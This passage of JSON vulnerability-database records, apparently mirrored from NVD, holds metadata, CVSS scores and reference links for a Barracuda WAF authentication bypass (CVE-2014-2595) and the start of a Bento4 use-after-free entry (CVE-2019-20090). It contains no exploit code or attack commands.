"1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "23075837e6c728c8f0077b2ae5d5ee7f", "key": "modified"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-13T14:29:47", "modified": "2020-02-12T13:07:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["cpe23", "cvss", "cvss2", "modified", "cpe", "cwe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-13T14:29:47"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-02-12T14:27:29", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-12T14:27:29", "value": 6.9, "vector": "NONE"}}, "hash": "6ccf8f84237981876cda9914b348e4e11c8972875cdf630f59422732f1ea69ba", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-12T14:27:29", "modified": "2020-02-12T01:15:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["modified"], "edition": 2, "lastseen": "2020-02-12T14:27:29"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-10-03T12:01:15", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-10-03T12:01:15", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [], "hash": "65fabd8c3b92ccbba797b3dfba517234b9e0e8bc2464531f2cd64047dd457870", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-10-03T12:01:15", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 56}, "differentElements": ["extraReferences"], "edition": 6, "lastseen": "2020-10-03T12:01:15"}, {"bulletin": {"affectedSoftware": [{"name": "barracuda web_application_firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-02-21T13:06:26", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-02-21T13:06:26", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "4423bdd8d6936961112ee89e752cf7c866f443470052f4a4ac3529b4be6ae18f", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}, {"hash": "ee2d931efb4c4fa7a1a321df76c0b838", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-21T13:06:26", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 47}, "differentElements": ["cvss3", "affectedSoftware"], "edition": 4, "lastseen": "2020-02-21T13:06:26"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "enchantments": {"dependencies": {"modified": "2021-02-02T06:14:28", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2021-02-02T06:14:28", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "hash": "d6e72c33ebf3accfe25046812d0b1e7698f2d37c9159defa7c7bda26e2ab359b", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "073d5951cb97bd54baf9ef00e5950ef4", "key": "extraReferences"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "immutableFields": [], "lastseen": "2021-02-02T06:14:28", "modified": "2020-02-20T15:55:00", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 60}, "different_elements": ["cpeConfiguration"], "edition": 7, "lastseen": "2021-02-02T06:14:28"}], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "enchantments": {"dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13887", "SECURITYVULNS:DOC:31004"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127740"]}, {"type": "exploitdb", "idList": ["EDB-ID:39278"]}], "modified": "2021-04-22T23:44:08", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-04-22T23:44:08", "rev": 2}}, "type": "cve", "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a97b191a26cb922c0b82d26c5f04f4db"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "832b9c21b4589969549f63eb0724398c"}, {"key": "cpe23", "hash": "405ecfc0fb244283a2773863614145bf"}, {"key": "cpeConfiguration", "hash": "238f536d7ccbcb60d24ab76ed2548b8b"}, {"key": "cvelist", "hash": "afd8c4a8002c25596504fc1efc107886"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "e63509ce8b627fb239a5a63969122026"}, {"key": "cvss3", "hash": "ad35358d166de03a84a3a9280d95337a"}, {"key": "cwe", "hash": "86870277fcb3e3e121fe9e4f1f7c2b51"}, {"key": "description", "hash": "584cd9e6927eaaa814c6545414f09911"}, {"key": "extraReferences", "hash": "073d5951cb97bd54baf9ef00e5950ef4"}, {"key": "href", "hash": "756bd44ad36e62b951b7a08611cbd3f5"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "92ee34fefd5301ff6ccb77b813c8d4f8"}, {"key": "published", "hash": "6c607768196e3786ab17cb3a6e516cad"}, {"key": "references", "hash": "cf46dbeffc0c7dc51130bcd388b4459a"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "bc7f8fc71017e1124d57947313af5643"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "scheme": null, "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cwe": ["CWE-613"], "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "immutableFields": []}, {"id": "CVE-2019-20090", "bulletinFamily": "NVD", "title": "CVE-2019-20090", "description": "An issue was discovered in Bento4 1.5.1.0. There is a use-after-free in AP4_Sample::GetOffset in Core/Ap4Sample.h when called from Ap4LinearReader.cpp.", "published": "2019-12-30T04:15:00", "modified": "2020-01-07T14:36:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20090", "reporter": "cve@mitre.org", "references": ["https://github.com/axiomatic-systems/Bento4/issues/461"], "cvelist": ["CVE-2019-20090"], "type": "cve", "lastseen": "2021-04-23T00:45:21", "history": [{"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2019-20090"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "An issue was discovered in Bento4 1.5.1.0. There is a use-after-free in AP4_Sample::GetOffset in Core/Ap4Sample.h when called from Ap4LinearReader.cpp.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-12-30T12:35:18", "references": []}, "score": {"modified": "2019-12-30T12:35:18", "value": 1.5, "vector": "NONE"}}, "hash": "c679ba3edd7dfa4099d67d34418bcd89c216b6589479da9cb6a746b4de7c0df6", "hashmap": [{"hash": "62031c2a868eba7d69bbab08b22ae213", "key": "title"}, {"hash": "5bc53355dce17cb2548e22adfc5d5784", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "715c352b1417612a17c041f28800ee72", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "5bc53355dce17cb2548e22adfc5d5784", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "955299dceef23d332206ba4e017eda9e", "key": "references"}, {"hash": "70d22c5efc8b5ab72e7dcdf19803b6c0", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "67b6cc116f4b6b7ece21a8a8312f3628", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20090", "id": "CVE-2019-20090", "lastseen": "2019-12-30T12:35:18", "modified": "2019-12-30T04:15:00", "objectVersion": "1.3", "published": "2019-12-30T04:15:00", "references": ["https://github.com/axiomatic-systems/Bento4/issues/461"], "reporter": "cve@mitre.org", "title": "CVE-2019-20090", "type": "cve", "viewCount": 57}, "differentElements": ["modified"], "edition": 1, "lastseen": "2019-12-30T12:35:18"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2019-20090"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "An issue was discovered in Bento4 1.5.1.0. There is a use-after-free in AP4_Sample::GetOffset in Core/Ap4Sample.h when called from Ap4LinearReader.cpp.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-12-31T12:36:45", "references": []}, "score": {"modified": "2019-12-31T12:36:45", "value": 1.5, "vector": "NONE"}}, "hash": "e2b786386f0dbeb2f6f94735b50cb07e649b57035e608fa416c9fe89f8804abb", "hashmap": [{"hash": "62031c2a868eba7d69bbab08b22ae213", "key": "title"}, {"hash": "5bc53355dce17cb2548e22adfc5d5784", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "715c352b1417612a17c041f28800ee72", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "955299dceef23d332206ba4e017eda9e", "key": "references"}, {"hash": "266309d6673829377f388ec5b9235654", "key": "modified"}, {"hash": "70d22c5efc8b5ab72e7dcdf19803b6c0", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "67b6cc116f4b6b7ece21a8a8312f3628", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20090", 